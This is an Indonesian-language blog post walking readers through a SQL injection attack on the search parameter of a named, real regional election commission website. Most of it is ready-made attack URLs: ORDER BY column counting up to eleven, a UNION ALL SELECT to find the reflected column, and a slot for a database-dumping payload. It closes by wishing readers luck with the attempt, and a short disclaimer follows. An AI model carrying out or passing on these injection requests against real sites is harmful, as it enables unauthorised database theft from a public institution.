Bug SQL on kpud-sidoarjo.go.id

Bug SQL On Website kpud sidoarjo

Jadi gini,saya dapat kabar dari teman saya bahwa ada bug sql injection di Web kpud sidoarjo di parameter search.Tunggu apa lagi langsung bahas aja :)

Langkah Langkah :

Kita order dulu seperti biasanya atau bisa lihat di bawah ini :

 https://kpud-sidoarjokab.go.id/search?s=%22+order+by+1--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+2--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+3--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+4--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+5--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+6--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+7--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+8--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+9--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+10--+-

https://kpud-sidoarjokab.go.id/search?s=%22+order+by+11--+-

Kita lihat ternyata blank atau errornya ada di angka 11, jadi kita ambil nomer yang belakangnya alias sebelum nya, jadi kita ambil nomer 10

Langkah Berikutnya :

Sekarang kita select website tujuan select adalah untuk memunculkan nomor togel/angka ajaib web tersebut.

%20union%20all%20select%20

Jangan lupa mainkan (-) / (%27) / (%22)

https://kpud-sidoarjokab.go.id/search?s=-%22%20union%20all%20select%201,2,3,4,5,6,7,8,9,10--+-

Maka akan muncuk angka ajaib nya atau juga di sebut angka sql ya gan, langkah berikutnya kita masukan dios pada angka ajaib itu.

Dump DataBase :

Masukan Dios kalian pada nomor ajaib website tersebut.

https://kpud-sidoarjokab.go.id/search?s=-%22%20union%20all%20select%201,('code dios kalian'),3,4,5,6,7,8,9,10--+-

Dan boom maka berhasil gan, selamat mencoba, See You Next time :)

https://kpud-sidoarjokab.go.id/

Peringatan

"Apapun yang ada di sini dan yang kalian lakukan,Admin tidak bertanggung jawab atas apa yang kalian pergunakan.Saya harap kalian bisa melindungi Website Negara Kalian Sendiri :)"

Bagikan Artikel ini